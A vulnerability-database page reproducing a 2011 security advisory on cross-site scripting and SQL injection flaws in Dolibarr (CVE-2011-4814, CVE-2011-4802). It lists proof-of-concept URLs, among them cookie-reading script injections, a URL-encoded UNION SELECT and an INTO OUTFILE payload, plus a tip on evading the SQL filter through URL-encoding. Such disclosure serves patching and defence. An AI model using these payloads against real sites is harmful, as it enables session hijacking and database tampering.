Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB23056
HistoryNov 02, 2011 - 12:00 a.m.

Multiple vulnerabilities in Dolibarr

2011-11-0200:00:00
High-Tech Bridge
www.htbridge.com
16

0.005 Low

EPSS

Percentile

76.0%

JSON

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Dolibarr, which can be exploited to perform cross-site scripting & sql injection attacks.

  1. Cross-Site scripting vulnerability in Dolibarr: CVE-2011-4814
    1.1 Input appended to the URL after multiple files is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site
    The following PoC code is available:
    http://[host]/index.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28do cument.cookie%29%3E
    http://[host]/admin/boxes.php/%22%3E%3Cimg%20src=1%20onerror=javascript:aler t%28document.cookie%29%3E
    http://[host]/comm/clients.php/%22%3E%3Cimg%20src=1%20onerror=javascript:ale rt%28document.cookie%29%3E
    http://[host]/commande/index.php/%22%3E%3Cimg%20src=1%20onerror=javascript:a lert%28document.cookie%29%3E
    Successful exploitation of this vulnerabilities requires that Apache’s directive “AcceptPathInfo” is set to “on” or “default” (default value is “default”)
    1.2 Input appended to the URL after multiple files is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site
    The following PoC code is available:
    http://[host]/admin/ihm.php?optioncss=%22%3E%3Cimg%20src=1%20onerror=javascr ipt:alert%28document.cookie%29%3E
    http://[host]/user/home.php?optioncss=%22%3E%3Cimg%20src=1%20onerror=javascr ipt:alert%28document.cookie%29%3E

  2. SQL injection vulnerability in Dolibarr: CVE-2011-4802
    2.1 Input passed via the “sortfield”, “sortorder” and “sall” GET parameters to /user/index.php is not properly sanitised before being used in a SQL query.
    This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
    The following PoC code is available:
    http://[host]/user/index.php?sall=1%%27%29%20%75%6e%69%6f%6e%20%73%65%6c%65% 63%74%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14%20–%20
    http://[host]/user/index.php?begin=search_user=&sall=&&sortfield=SQL_CODE_HE RE
    http://[host]/user/index.php?begin=search_user=&sall=&sortfield=u.login&sort order=SQL_CODE_HERE
    Successful exploitation of this vulnerabilities requires attacker to be registered and logged-in.
    To bypass Dolibarr sql-injection filter and exploit this vulnerability an attacker should use url-encode technique.
    2.2 Input passed via the “id” GET parameter to /user/info.php, /user/perms.php, /user/param_ihm.php, /user/note.php, /user/fiche.php is not properly sanitised before being used in a SQL query.
    This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
    The following PoC code is available:
    http://[host]/user/info.php?id=1 INTO OUTFILE ‘…/…/…/tmp/example’
    Successful exploitation of this vulnerability requires attacker to be registered and logged-in.
    To bypass Dolibarr sql-injection filter and exploit this vulnerability an attacker should use url-encode technique.
    2.3 Input passed via the “rowid” GET parameter to /admin/boxes.php is not properly sanitised before being used in a SQL query.
    This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
    The following PoC code is available:
    http://[host]/admin/boxes.php?action=delete&rowid=SQL_CODE_HERE
    Successful exploitation of this vulnerability requires attacker to be registered and logged-in.
    To bypass Dolibarr sql-injection filter and exploit this vulnerability an attacker should use url-encode technique.
    2.4 Input passed via the “sortfield” & “sortorder” & “sall” GET parameters to /user/group/index.php is not properly sanitised before being used in a SQL query.
    This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
    The following PoC code is available:
    http://[host]/user/group/index.php?begin=search_user=&sall=&&sortfield=SQL_C ODE_HERE
    http://[host]/user/group/index.php?begin=search_user=&sall=&sortfield=u.logi n&sortorder=SQL_CODE_HERE
    http://[host]/user/group/index.php?sall=SQL_CODE_HERE
    Successful exploitation of this vulnerabilities requires attacker to be registered and logged-in.
    To bypass Dolibarr sql-injection filter and exploit this vulnerability an attacker should use url-encode technique.

CPENameOperatorVersion
dolibarrle3.1.0

Related

openvas 1
cvelist 2
nessus 1
prion 2
cve 2
nvd 2
openvas
openvas
Dolibarr < 3.1RC3 Multiple Vulnerabilities - Active Check
2011-12-15 00:00:00
cvelist
cvelist
CVE-2011-4814
2011-12-14 00:00:00
CVE-2011-4802
2011-12-14 00:00:00
nessus
nessus
Dolibarr Multiple Script URI XSS
2012-04-13 00:00:00
prion
prion
Sql injection
2011-12-14 00:55:00
Cross site scripting
2011-12-14 00:55:00
cve
cve
CVE-2011-4814
2011-12-14 00:55:19
CVE-2011-4802
2011-12-14 00:55:04
nvd
nvd
CVE-2011-4814
2011-12-14 00:55:19
CVE-2011-4802
2011-12-14 00:55:04

0.005 Low

EPSS

Percentile

76.0%

JSON
Related for HTB23056
openvas1cvelist2nessus1prion2cve2nvd2